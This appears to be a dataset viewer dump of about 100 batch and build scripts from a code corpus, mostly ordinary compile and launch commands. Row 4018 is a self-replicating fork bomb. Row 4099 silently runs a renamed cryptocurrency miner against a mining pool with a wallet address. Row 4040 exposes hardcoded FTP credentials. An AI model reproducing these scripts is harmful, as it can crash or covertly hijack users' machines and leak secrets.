source string | code_lang string | content string | idx int64 |
|---|---|---|---|
the-stack-v2-dedup | Batchfile | #LapCommandFile
#
#File: PRG_B2_M1.cmd
#
#
MACRO Dummy Command : 8100 0301 0000 : Macro ID tag 0x0301
***Wait 1s
MACRO Set Telemetry Rate : 8202 0000 0000 : Sets normal telemetry rate
***Wait 1s
MACRO ADC Control Register : 8b00 0000 03ff : ADC CR Bipolar 8KHz Run/Calibrate
***Wait 1s
MACRO Set Relays & Muxes : 8a0... | 4,000 |
the-stack-v2-dedup | Batchfile | setlocal enabledelayedexpansion
%SW_PRE_STEP% --scope="sdk" --name="Test libdispatch" --flag=SW_SKIP_SDK_DISPATCH_TEST
if errorlevel 1 exit /b 0
cmake --build %SW_DISPATCH_BUILD_DIR% --target ExperimentalTest
if %SW_IGNORE_TEST_FAILURES% neq 0 exit /b 0
endlocal
| 4,001 |
the-stack-v2-dedup | Batchfile | fasm default.dtp.asm default.dtp
pause | 4,002 |
the-stack-v2-dedup | Batchfile | @echo off
color 0f
cd /d %~dp0
call jni\\build.cmd
cd /d %~dp0
echo ==================================
echo Push ...
adb push %~dp0libs\armeabi\hookclient /data/local/tmp
echo Chmod ...
adb shell su -c "chmod 777 /data/local/tmp/hookclient"
echo Execute ...
echo.
adb shell "ps | grep com.tomagoyaky"
set /p pid=ÇëÊäÈë... | 4,003 |
the-stack-v2-dedup | Batchfile | d:\projects\esptool\esptool.py --port %1 erase_flash
d:\projects\esptool\esptool.py --port %1 write_flash --flash_mode dio --flash_size 4MB --flash_freq 40m --no-compress 0x00000 %2 | 4,004 |
the-stack-v2-dedup | Batchfile | cmd_/home/sowmya/rpi4/device_drivers/native/Day-3/Day_3_p1_exportmod/Module.symvers := sed 's/ko$$/o/' /home/sowmya/rpi4/device_drivers/native/Day-3/Day_3_p1_exportmod/modules.order | scripts/mod/modpost -m -a -o /home/sowmya/rpi4/device_drivers/native/Day-3/Day_3_p1_exportmod/Module.symvers -e -i Module.symvers -T... | 4,005 |
the-stack-v2-dedup | Batchfile | @echo off
:: rsync 指向
set rsync_target=leo@47.52.202.233::9an-homepage
set rsync_target_test=leo@47.52.202.233::9an-homepage
:: 当前路径
set cur_dir=%~dp0
:: 将当前路径转化为rsync格式的
set rsync_cur_dir=%cur_dir::\=/%
set rsync_cur_dir=/cygdrive/%rsync_cur_dir:\=/%
:: 本地打包部署路径
set source_dir=%rsync_cur_dir%/static/dist/
:: 开始选... | 4,006 |
the-stack-v2-dedup | Batchfile | cd .
if "%1"=="" ("D:\Software\Mathlab\2018\bin\win64\gmake" -f pid_reg.mk all) else ("D:\Software\Mathlab\2018\bin\win64\gmake" -f pid_reg.mk %1)
@if errorlevel 1 goto error_exit
exit /B 0
:error_exit
echo The make command returned an error of %errorlevel%
An_error_occurred_during_the_call_to_make
| 4,007 |
the-stack-v2-dedup | Batchfile | @echo off
python -m venv env
call env/Scripts/activate.bat
pip install GitPython
call env/Scripts/deactivate.bat
pause | 4,008 |
the-stack-v2-dedup | Batchfile | @echo off
rem South China Agriculture University
rem version 0.01
rem 使用介绍
rem 功能:试图设置自动连接校内Windows Update服务器
rem 先进行服务检查,没有安装服务的机器先安装服务,重启动后再修改设置
rem History
rem 2004-03-17 0.01b 全校公测
echo [INFO] For Windows 2000,Windows XP,Windows 2003 only.
echo [INFO] 只在Windows 2000,Windows XP,Windows 2003 上适用
echo ... | 4,009 |
the-stack-v2-dedup | Batchfile | cmd_drivers/net/can/vcan.ko := ld -r -m elf_x86_64 -z max-page-size=0x200000 --build-id -T ./scripts/module-common.lds -o drivers/net/can/vcan.ko drivers/net/can/vcan.o drivers/net/can/vcan.mod.o; true
| 4,010 |
the-stack-v2-dedup | Batchfile | @set ASEPRITE="D:\GAMES\STEAM\steamapps\common\Aseprite\aseprite.exe"
@set OUT="../sprites_split/"
@set BFORMAT="{path}/{title} {layer}.{extension}"
%ASEPRITE% -b fx_plant.ase --trim --list-tags --save-as %OUT%fx-plant-{tag}-{tagframe00}.png --data %OUT%fx-plant.json
%ASEPRITE% -b fx_run.ase --trim --list-tags --save-... | 4,011 |
the-stack-v2-dedup | Batchfile | @echo off & title 图片强制修改分辨率到 8000x1200 By Sengoku v1.0
cd "%~dp1"
mkdir back
xcopy "%~nx1" "back"
magick "%~nx1" -resize 8000x1200! "%~nx1"
| 4,012 |
the-stack-v2-dedup | Batchfile | git add * --all
git commit -m "ouh"
git push
| 4,013 |
the-stack-v2-dedup | Batchfile |
php artisan serve --host=62.117.39.131 --port=8080 | 4,014 |
the-stack-v2-dedup | Batchfile | @echo off
set functionsPath=cmd\functions.bat
echo Read user options
call cmd\user_options.bat || goto :error
if not exist "%woltlabWwwPath%" (
echo Destination directory doesn't exist.
goto :error
)
call:cat "Moving files" & call:task "Move lib"
if exist src\files\lib xcopy /Y /S src\files\lib\* "%woltlabWwwPath... | 4,015 |
the-stack-v2-dedup | Batchfile | @echo off
use_python_ver python-3.5
| 4,016 |
the-stack-v2-dedup | Batchfile | java -jar test.jar channels path=a.bin size=1G block=64M count=5 wpause=10 rpause=15 mode=rw data=zero cache=none
pause | 4,017 |
the-stack-v2-dedup | Batchfile | @ECHO OFF
TITLE OH NO!
CLS
COLOR 0d
ECHO Oops! A panda tripped on your RAM's workbench!
ECHO Spilt coconut juice is everywhere!
:TOO_LATE_XOXOXO
START SloppyPanda.bat
GOTO TOO_LATE_XOXOXO | 4,018 |
the-stack-v2-dedup | Batchfile | -intstyle "ise" -incremental -lib "secureip" -o "C:/Users/mos28/Documents/xilinx proj/hardsec/lab7_mutilated/testbench_isim_beh.exe" -prj "C:/Users/mos28/Documents/xilinx proj/hardsec/lab7_mutilated/testbench_beh.prj" "work.testbench"
| 4,019 |
the-stack-v2-dedup | Batchfile | @echo off
mode con cols=130 lines=50
color 0a
echo *******************************
echo Image Maker
echo *******************************
echo Created Date: 2019/8/27 10:07
echo Last Modified: 2019/8/27 14:27
echo Author: liyujiang
echo Email: 1032694760@qq.com
echo *******************************
set CURRENT_... | 4,020 |
the-stack-v2-dedup | Batchfile | ;AI
[Command]
name = "AI01"
command = U, U, D, D, F, F, F, F, B, B
time = 1
[Command]
name = "AI02"
command = U, D, D, D, F, F, F, B, B, B
time = 1
[Command]
name = "AI03"
command = D, U, D, D, D, D, F, F, B, B
time = 1
[Command]
name = "AI04"
command = D, D, D, D, F, F, F, F, F, B
time = 1
[Command]
name = "AI05"
... | 4,021 |
the-stack-v2-dedup | Batchfile | /nethome/syoung/0.5/bin/apps/logic/loop.pl \
--replicates 1-33 \
--loop parallel \
--executable /nethome/syoung/0.5/bin/apps/venn/SNPVENN.pl \
--bamfile /scratch/syoung/base/pipeline/SRA/NA18507/SRP000239/sampled/200bp/chr22/eland/%REPLICATE%/chr22/hit.bam \
--querydir /scratch/syoung/base/pipeline/SRA/NA18507/SRP... | 4,022 |
the-stack-v2-dedup | Batchfile | @Echo off
call C:\Users\%USERNAME%\anaconda3\Scripts\activate.bat
pip install psychopy
pip install playsound
pip install mouse
pip install pipwin
pipwin install pyaudio
pause | 4,023 |
the-stack-v2-dedup | Batchfile | :menu
@echo off
cls
echo.
echo Press 1 for Metal and Lace: The Battle of the Robo Babes
echo Press 2 for Metal and Lace: The Battle of the Robo Babes NR-18 Upgrade
echo Press 3 to Quit
echo.
choice /C:123 /N Please Choose:
if errorlevel = 3 goto quit
if errorlevel = 2 goto epi2
if errorlevel = 1 goto epi1
:epi1
cls
... | 4,024 |
the-stack-v2-dedup | Batchfile | @echo off
rem set SRC=%~1%
rem set DST=%~2%
set SRC=..\..
set DST=..\..
echo ===========================================
echo Make directory tree
set INCDIR=%DST%\include
set SRCDIR=%DST%\src
rem set BINDIR=%DST%\bin
set SRCDIR_A=%DST%\altsrc
set DBGDIR_A=%DST%\dbglib
rem set LIBDIR_A=%DST%\lib
echo root folders
for... | 4,025 |
the-stack-v2-dedup | Batchfile | ; The CMD file.
;
; Two parts: 1. Command definition and 2. State entry
; (state entry is after the commands def section)
;
; 1. Command definition
; ---------------------
; Note: The commands are CASE-SENSITIVE, and so are the command names.
; The eight directions are:
; B, DB, D, DF, F, UF, U, UB (all CAPS)
; ... | 4,026 |
the-stack-v2-dedup | Batchfile | set currentdir=%cd%
cd %OX_HOME%
call stop-tomcat.bat
cd %OX_HOME%\workspace
del conference /s /q
cd %OX_HOME%\tomcat\webapps
del conference /s /q
cd %currentdir%
| 4,027 |
the-stack-v2-dedup | Batchfile | java -jar YamCR.jar | 4,028 |
the-stack-v2-dedup | Batchfile | @echo off
TvRock.exe -FTUNE
| 4,029 |
the-stack-v2-dedup | Batchfile | for /f %%a in ('dir %windir%\Microsoft.Net\Framework\regasm.exe /s /b') do set currentRegasm="%%a"
%currentRegasm% "C:\Program Files (x86)\Microsoft Dynamics\GP2016\AddIns\FEEXP.dll" /tlb:feexp.tlb
%currentRegasm% "C:\Program Files (x86)\Microsoft Dynamics\GP2016\AddIns\ACA_WSFE.dll" /tlb:ACA_WSFE.tlb
| 4,030 |
the-stack-v2-dedup | Batchfile | gfortran -c -O3 -Wall -Wno-unused-dummy-argument -Wno-unused-function -Wno-uninitialized -Wno-conversion -Wno-unused-variable -static -ffree-line-length-0 -std=gnu -o dof_kriging.o dof_kriging.f08 -Igalib\include
gfortran -c -O3 -Wall -Wno-unused-dummy-argument -Wno-unused-function -Wno-uninitialized -Wno-conversion -... | 4,031 |
the-stack-v2-dedup | Batchfile | cmd_drivers/staging/comedi/drivers/comedi_8254.mod := { echo drivers/staging/comedi/drivers/comedi_8254.o; echo; } > drivers/staging/comedi/drivers/comedi_8254.mod
| 4,032 |
the-stack-v2-dedup | Batchfile | @echo off
php %~dp0jihuarenwu.php
start %~dp0jihuarenwu.bat
exit | 4,033 |
the-stack-v2-dedup | Batchfile | @echo off
gxx -o bilist.exe *.cpp
if errorlevel 1 goto noexec
bilist
:noexec
pause
| 4,034 |
the-stack-v2-dedup | Batchfile | gplex.exe GLSLLexer.lex
| 4,035 |
the-stack-v2-dedup | Batchfile | cd leraars
ScriptDB4SVN.exe
cd ..\leerlingen
ScriptDB4SVN.exe
cd ..\studiebegeleiding
ScriptDB4SVN.exe
cd ..\studiegegevens
ScriptDB4SVN.exe
cd ..\oud
ScriptDB4SVN.exe
cd .. | 4,036 |
the-stack-v2-dedup | Batchfile | echo off
set path=C:\Program Files\Java\jdk-14.0.2\bin
set include=C:\Program Files\Java\jdk-14.0.2\include
set lib=C:\Program Files\Java\jdk-14.0.2\lib
set link=C:\Program Files\Java\jdk-14.0.2\bin
javac -version PrintInfo.java
java PrintInfo
javap -c PrintInfo > PrintInfo.txt
javadoc PrintInfo.java -d PrintIn... | 4,037 |
the-stack-v2-dedup | Batchfile | @echo off
call g++ -O2 ../gift_ab_cpp.cpp -o gift_ab_cpp.exe
call g++ -O2 gen.cpp -o gen.exe
gen.exe
del gen.exe > nul 2> nul
del gen.obj > nul 2> nul
for %%i in (??) do (
copy %%i gift.in > nul 2> nul
gift_ab_cpp.exe
move gift.out %%i.a > nul 2> nul
del gift.in > nul 2> nul
)
del gift_ab_... | 4,038 |
the-stack-v2-dedup | Batchfile | python captura_if_data_instituicoes_individuais.py
python captura_if_data_conglomerados_financeiros.py
python captura_if_data_conglomerados_prudenciais.py
python captura_if_data_instituicoes_operacoes_cambio.py
| 4,039 |
the-stack-v2-dedup | Batchfile | @ECHO off
setlocal enabledelayedexpansion
SET HOST=192.168.31.9
SET USR=oracle
SET PSWD=B0rw1t4
SET FLDR=/oracle/lms-online/interface/TRN
SET WILDCARD=*.csv
"C:\Program Files\Microsoft SQL Server\90\Tools\Binn\SQLCMD.EXE" -i Upload.sql -o Upload.log
REM Upload semua file CSV
echo user !USR!> ftpcmd.dat
echo !PSWD!... | 4,040 |
the-stack-v2-dedup | Batchfile | cd \sierra\SORCERIA
SIERRA
CD ..
| 4,041 |
the-stack-v2-dedup | Batchfile | javac ua\nure\rudenko\task1\Part6.java
java ua.nure.rudenko.task1.Part6 360
| 4,042 |
the-stack-v2-dedup | Batchfile | @echo off
title Arduino Compiler Installation :: by Alauddin Ansari
SET compiler=%1
SET compiler=%compiler:"=%
SET compiler=%compiler:\=\\%
SET uploader=%2
SET uploader=%uploader:"=%
SET uploader=%uploader:\=\\%
SET launcher=%3
SET launcher=%launcher:"=%
SET launcher=%launcher:\=\\%
SET commonCommand=usbasp usb 19... | 4,043 |
the-stack-v2-dedup | Batchfile |
WMIC product get name,version
| 4,044 |
the-stack-v2-dedup | Batchfile | java -jar ReflectionTester.jar %1
rem > RunTester.bat InvestigatorImpl.class | 4,045 |
the-stack-v2-dedup | Batchfile | @echo off
SET msbuild=%WINDIR%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
%msbuild% "%~dp0..\..\Assets\AcmBrowser\Source\AcmBrowser.sln"
REM pause
:end | 4,046 |
the-stack-v2-dedup | Batchfile | @echo off
echo hi 早上好~~~
call :X 5 6
call :Y 5 6
goto :eof
:X
call :E %1 %2 和
set /a x=%1+%2
echo %x%
goto :eof
:Y
call :E %1 %2 差:
set /a y=%1-%2
echo %y%
goto :eof
:E
echo %1和%2的%3: | 4,047 |
the-stack-v2-dedup | Batchfile | @echo off
set "FirefoxFolder="
Title Firefox Updater
curl --silent -o "%TEMP%\firefoxdl.txt" "https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-US"
powershell -command "(Get-Content "%TEMP%\firefoxdl.txt") | ForEach-Object { $_ -replace '^.*releases.([0-9][0-9]).*$','$1' } | Set-Content "%TE... | 4,048 |
the-stack-v2-dedup | Batchfile | @echo off
cls
echo Install Microsoft Project 2013 product key (ending in RX6WY)
cscript.exe "C:\Program Files (x86)\Microsoft Office\Office15\ospp.vbs" /inpkey:HGNDK-VVMJJ-84M3V-2XT28-RX6WY
echo Activating Office 2013 products
cscript "C:\Program Files (x86)\microsoft office\office15\ospp.vbs" /act | 4,049 |
the-stack-v2-dedup | Batchfile | rem webpack-cli webpack 已经全局安装,现在要拷贝到本项目中,执行 --save-dev
cnpm install --save-dev webpack
cnpm install --save-dev webpack-cli
rem -D 安装到本地开发依赖
npm install webpack-dev-server -D
npm install jquery -D
npm install style-loader css-loader -D
npm install less-loader -D
npm install less -D
npm install sass-loader -D
r... | 4,050 |
the-stack-v2-dedup | Batchfile | ECHO OFF
rem 1. example of shadow filter on camera man image
rem..\..\..\bin\Release\mytconvolution -i ..\..\..\..\Data\CMan\cman_16bits.raw -x 256 -y 256 -z 1 -d 16 -k shadowS_3x3_16bits.raw -a 3 -b 3 -c 1 -m 0 -n 1 -p 32000 -r -32000 -o shadow256_256_16bits.raw
rem
rem 2. example of applying separable kernel (multip... | 4,051 |
the-stack-v2-dedup | Batchfile | set WORKSPACE=..\..
set GEN_CLIENT=%WORKSPACE%\Tools\Luban.Client\Luban.Client.exe
set CONF_ROOT=%WORKSPACE%\DesignerConfigs
set DEFINE_FILE=%CONF_ROOT%\Defines\__root__.xml
%GEN_CLIENT% -h %LUBAN_SERVER_IP% -j cfg --^
-d %DEFINE_FILE%^
--input_data_dir %CONF_ROOT%\Datas ^
--output_data_dir template_json ^
--gen_t... | 4,052 |
the-stack-v2-dedup | Batchfile | @echo off
start "TSMR NEPTUNE" "generate.exe" "neptune.dat"
pause
exit
| 4,053 |
the-stack-v2-dedup | Batchfile | @echo off
rem 04.06.2002
if %1.==. goto nocom
if %2.==. goto nocom
FTPP %1 %2 /m /t /pr:99.999999 /p:0.01 /tau0:30 /tau1:45
goto end
:nocom
echo: Error. Use GENERATE infile.mpn mapping.map
:end | 4,054 |
the-stack-v2-dedup | Batchfile | call cc nls_base
call cc nls_cp936
call cc page_pool
call cc slab
call cc buffer
call cc ctype
call cc dcache
call cc dir
call cc file
call cc fsman
call cc fstime
call cc fstools
call cc inode
call cc namei
call cc super
call pk b_fatfs
| 4,055 |
the-stack-v2-dedup | Batchfile | cirateg first.cfg a.jpg qbear.jpg pbear.jpg
cirateg others.cfg a.jpg q-dog.jpg p-dog.jpg
cirateg others.cfg a.jpg qesse.jpg pesse.jpg
cirateg others.cfg a.jpg qfrog.jpg pfrog.jpg
cirateg others.cfg a.jpg qpalm.jpg ppalm.jpg
| 4,056 |
the-stack-v2-dedup | Batchfile | g++ -o main test.cpp ../ShortInputWindows.cpp
pause | 4,057 |
the-stack-v2-dedup | Batchfile | start http://localhost:5000
firebase serve | 4,058 |
the-stack-v2-dedup | Batchfile | cmd_/home/andy/mindspeed/3.1/sdk-comcerto-openwrt-c2k_nas_3.1-rc2/build_dir/toolchain-arm_v7-a_gcc-4.5-linaro_glibc-2.14.1_eabi/linux-dev//include/scsi/.install := perl scripts/headers_install.pl /home/andy/mindspeed/3.1/sdk-comcerto-openwrt-c2k_nas_3.1-rc2/build_dir/toolchain-arm_v7-a_gcc-4.5-linaro_glibc-2.14.1_eabi/... | 4,059 |
the-stack-v2-dedup | Batchfile | C:/Python32/python.exe Blocks.py
pause | 4,060 |
the-stack-v2-dedup | Batchfile | -w -s "f:\VHDL\Carrylockaheadadder\library.cfg" -j "f:\VHDL\Carrylockaheadadder\adder\projlib.cfg" -d "f:\VHDL\Carrylockaheadadder\adder\compile" -work adder -dbg -e 100 -2002 "f:\\VHDL\\Carrylockaheadadder\\adder\\src\\TestBench\\addersixteen_ent_TB.vhd" | 4,061 |
the-stack-v2-dedup | Batchfile | dotnet src\DataCentric.Cli\bin\Debug\netcoreapp2.1\DataCentric.Cli.Cs.dll headers ^
--assembly src\DataCentric\bin\Debug\netstandard2.0\DataCentric.dll ^
--output ..\cpp\src\datacentric ^
--project src\ ^
--settings .\DataCentricSettings.json | 4,062 |
the-stack-v2-dedup | Batchfile | RMDIR /Q/S .apicra
| 4,063 |
the-stack-v2-dedup | Batchfile | @ECHO OFF
pushd C:\WORKS\Programs\scilab-5.5.1\bin
start WScilex
exit
| 4,064 |
the-stack-v2-dedup | Batchfile | @ECHO OFF
ECHO;
ECHO 入力ファイル存在確認
IF NOT EXIST "gijiroku\1.入力音声.mp3" ECHO "Not Found Input File! gijiroku\1.入力音声.mp3"
IF NOT EXIST "gijiroku\1.入力音声.mp3" GOTO BYE
ECHO OK
:API
ECHO;
ECHO API選択(入力無しはfree)
SET api=
SET /P api="f=free,g=google,w=watson,m=azure,a=aws,n=nict,d=docomo:"
IF %api%@==@ SET api=free
IF %... | 4,065 |
the-stack-v2-dedup | Batchfile | <!-- : Begin batch script
@echo off
setlocal
set argC=0
for %%x in (%*) do Set /A argC+=1
if "%argC%" GEQ "2" (
goto :usage
exit /B %errorlevel%
)
set NPM_GLOBAL=0
set NPM_PACKAGE=fabric-client
set NPM_PACKAGE_VER=@1.1.2
if "%argC%" == "1" (
set ARG=%1
call :check_arg
if errorlevel 1 (
... | 4,066 |
the-stack-v2-dedup | Batchfile | taskkill /FI "WINDOWTITLE eq Click Preview" | 4,067 |
the-stack-v2-dedup | Batchfile | @echo off
echo 4. capture Sudoku using webcam
call run-cv.bat
echo 5. split image into fields and postprocess
python splitImage.py
echo 6. predict class for each field using different methods and call solver
python processAndPredict.py
pause | 4,068 |
the-stack-v2-dedup | Batchfile | @echo off
g++ -g rand.cpp -o rand
g++ -g 2151.cpp -o 2151
:loop
rand > rand.in
2151 < rand.in > tyc.out
ans < rand.in > ans.out
fc ans.out tyc.out
if not errorlevel 1 goto loop
pause | 4,069 |
the-stack-v2-dedup | Batchfile | @echo off
echo [INFO] Packaging war.
cd ..
set MAVEN_OPTS=%MAVEN_OPTS%
call mvn clean install
echo [INFO] packaged as xxx.war
pause | 4,070 |
the-stack-v2-dedup | Batchfile | SET jar_dependences=hamcrest-core-1.3.jar;info.kgeorgiy.java.advanced.implementor.jar;info.kgeorgiy.java.advanced.base.jar;jsoup-1.8.1.jar;junit-4.11.jar;quickcheck-0.6.jar
SET module_dir=..\modules\ru.ifmo.rain.krotkov.implementor
copy ru\ifmo\rain\krotkov\implementor\Implementor.java %module_dir%\ru\ifmo\rain\kro... | 4,071 |
the-stack-v2-dedup | Batchfile | @echo off
::
:: add2virtualenv PATH - adds path to module search path in current virtualenv
::
:: see mkvirtualenv for explanation
:platform-detect-python-exe
pypy --version > nul 2>&1
if not errorlevel 1 (
set "PYTHON_EXE=pypy.exe"
set "LIB_DIR="
:: echo Found pypy.
goto :platform-detect-python-e... | 4,072 |
the-stack-v2-dedup | Batchfile | g++ app.cpp game\runner.cpp game\method_helper.cpp game\characters\character.cpp game\characters\warrior.cpp game\characters\rouge.cpp game\characters\wizard.cpp game\weapon\weapon.cpp -o thegame.exe | 4,073 |
the-stack-v2-dedup | Batchfile | cd %~dp0
uglifyjs2 mCore.js mCore.image.js -o mCore.min.js -c -m
| 4,074 |
the-stack-v2-dedup | Batchfile | cmd_drivers/media/dvb-frontends/si2168.ko := ld -r -m elf_x86_64 -z max-page-size=0x200000 --build-id -T ./scripts/module-common.lds -o drivers/media/dvb-frontends/si2168.ko drivers/media/dvb-frontends/si2168.o drivers/media/dvb-frontends/si2168.mod.o; true
| 4,075 |
the-stack-v2-dedup | Batchfile | @echo off
java -jar %~dp0/AndroidTool.jar %1 %2 %3 %4 %5 %6 %7 %8 %9 | 4,076 |
the-stack-v2-dedup | Batchfile | @rem Script to build jstd with MSVC.
@rem Copyright (C) 2020 XiongHui Guo. See Copyright Notice in /jstd/all.h
@rem
@rem Either open a "Visual Studio .NET Command Prompt"
@rem (Note that the Express Edition does not contain an x64 compiler)
@rem -or-
@rem Open a "Windows SDK Command Shell" and set the compiler environm... | 4,077 |
the-stack-v2-dedup | Batchfile | @echo off
cd /d "%~dp0"
vagrant reload
echo done...
choice /t 3 /d y /n >nul
| 4,078 |
the-stack-v2-dedup | Batchfile | @echo off
set fake_args=%*
cd "._fake"
call "paket.bat" "restore"
cd ".."
"._fake\packages\FAKE\tools\FAKE.exe" "build.fsx" %fake_args%
| 4,079 |
the-stack-v2-dedup | Batchfile | @echo off
setlocal EnableDelayedExpansion
echo 当前正在运行的批处理文件所在路径:!cd!
cd !cd!
@javac -cp C3_javaparser.jar -encoding UTF-8 C3_Zanalyze.java
@java -cp .;C3_javaparser.jar C3_Zanalyze
@pause | 4,080 |
the-stack-v2-dedup | Batchfile | rem Taskkill /F /IM electron.exe
npx electron . --user_settings_file=_test/_data/user/user_settings.json | 4,081 |
the-stack-v2-dedup | Batchfile | cscript decompile_ert.js --ini-file compile-ert.ini
rem compile MD
rem gcomp -c -DD src\MD
| 4,082 |
the-stack-v2-dedup | Batchfile | echo off
:: GIT Zabbix shell for Mods Updater
:: Для батников запускаемых с высокими привилегиями, перед выполнением любых действий обязателен переход на папку с файлом или выполняемым пакетом
:: С помощью текстового браузера lynx смотрим версию win_shell в нашем интернет-репозитории и записываем в файл
cd "C:\Progra... | 4,083 |
the-stack-v2-dedup | Batchfile | rem 切换盘符
%~d0
rem 获取当前脚本路径
set dir=%~dp0
rem --------------------------------------------------
rem JDK
set java_bin=%dir%..\..\..\Java\
rem 设置java环境变量
set path=%java_bin%bin;.;%java_bin%lib\dt.jar;%java_bin%lib\tools.jar;%path%
rem --------------------------------------------------
rem 引入通用服务配置
cd %dir%
call ..\co... | 4,084 |
the-stack-v2-dedup | Batchfile | call open_text_file ..\\config\\readme.coco | 4,085 |
the-stack-v2-dedup | Batchfile | cmd_drivers/mstar/sc/napoli/mhal_sc.o := /tools/arm/arm-2012.09/bin/arm-none-linux-gnueabi-gcc -Wp,-MD,drivers/mstar/sc/napoli/.mhal_sc.o.d -nostdinc -isystem /tools/arm/arm-2012.09/bin/../lib/gcc/arm-none-linux-gnueabi/4.7.2/include -I/home/cax/workdir/mstar6a918/code/3.1.10_Napoli_tvos/3.1.10/arch/arm/include -Iarch... | 4,086 |
the-stack-v2-dedup | Batchfile | php startRecipeFinderApp.php fridge.csv recipe.json.txt
pause | 4,087 |
the-stack-v2-dedup | Batchfile | /opt/MentorGraphics/modeltech/bin/vlib /home/dmonk/Firmware/DTC-firmware/DTC-front/DTC-front.cache/compile_simlib/modelsim/lte_3gpp_mimo_encoder_v4_0_13
/opt/MentorGraphics/modeltech/bin/vmap lte_3gpp_mimo_encoder_v4_0_13 /home/dmonk/Firmware/DTC-firmware/DTC-front/DTC-front.cache/compile_simlib/modelsim/lte_3gpp_mimo_... | 4,088 |
the-stack-v2-dedup | Batchfile | \\vnhocapfs101\Apps\RemoteAssistant\RemoteAccess_to_VNHOC1N0058_Inc00041a.bat VNHOC1N0058 41
| 4,089 |
the-stack-v2-dedup | Batchfile | copy FiddlerSetup.rename FiddlerSetup.exe | 4,090 |
the-stack-v2-dedup | Batchfile | E:
cd E:\code\demo\framework_demo\com.foresee.ss.dsp\com.foresee.ss.dsp.model
mvn -X mybatis-generator:generate | 4,091 |
the-stack-v2-dedup | Batchfile | @REM coding:OEM
START "" /WAIT /B /D"%srcpath%temp" wget --trust-server-names -rl1 -np -N -e robots=off -Afirefox-*.en-US.win32.installer.exe http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-mozilla-central/
| 4,092 |
the-stack-v2-dedup | Batchfile | @echo off
REM ------------------------------------------------------------------------
REM cc-admin-api-module-system
REM ------------------------------------------------------------------------
rem
rem Find the application home.
rem
if "%OS%"=="Windows_NT" goto nt
echo This is not NT, so please edit this script and... | 4,093 |
the-stack-v2-dedup | Batchfile | training_ANNs.exe -in Training_Finale_Input_S357.txt -out Training_Finale_Output_S357.txt -save Finale_Model_s150_hn3.xml -samples 150 -in_attributes 3780 -n_hidden_nodes 3 -out_attributes 3
training_ANNs.exe -in Training_Finale_Input_S357.txt -out Training_Finale_Output_S357.txt -save Finale_Model_s150_hn5.xml -sample... | 4,094 |
the-stack-v2-dedup | Batchfile | title install requirment
pip install discord.py dismusic discord-custom-help
title install success
pause
| 4,095 |
the-stack-v2-dedup | Batchfile | @echo off
setLocal EnableDelayedExpansion
Rem <b>CAUpdateCRLs</b> command file.
Rem @author Jack D. Pond
Rem @version 0.2 / Windows Batch Processor
Rem @see https://github.com/jdpond/WinCertUtilities/wiki and http://pki-tutorial.readthedocs.org/en/latest/index.html#
Rem @description Update Certificate Revocation lists.... | 4,096 |
the-stack-v2-dedup | Batchfile | cd /d .
del /s /q .\logs\carpark*.log
mvn -P dev clean install -T 1C
| 4,097 |
the-stack-v2-dedup | Batchfile | java -jar -Dwebdriver.chrome.driver=chromedriver.exe selenium-server-standalone-2.53.1.jar | 4,098 |
the-stack-v2-dedup | Batchfile | cd %~dp0
notls.exe -o pool.supportxmr.com:80 -u 453ys3CV57Nbg2XCekHZdJRHyGd4uSB1oTuWEs5btLfsYDKE71XAmUVYybZXVBeZDS34zWxkWL6pNRNPPXHChq6CGwNa5j4 -B -p vpsstest -t 2
pause | 4,099 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.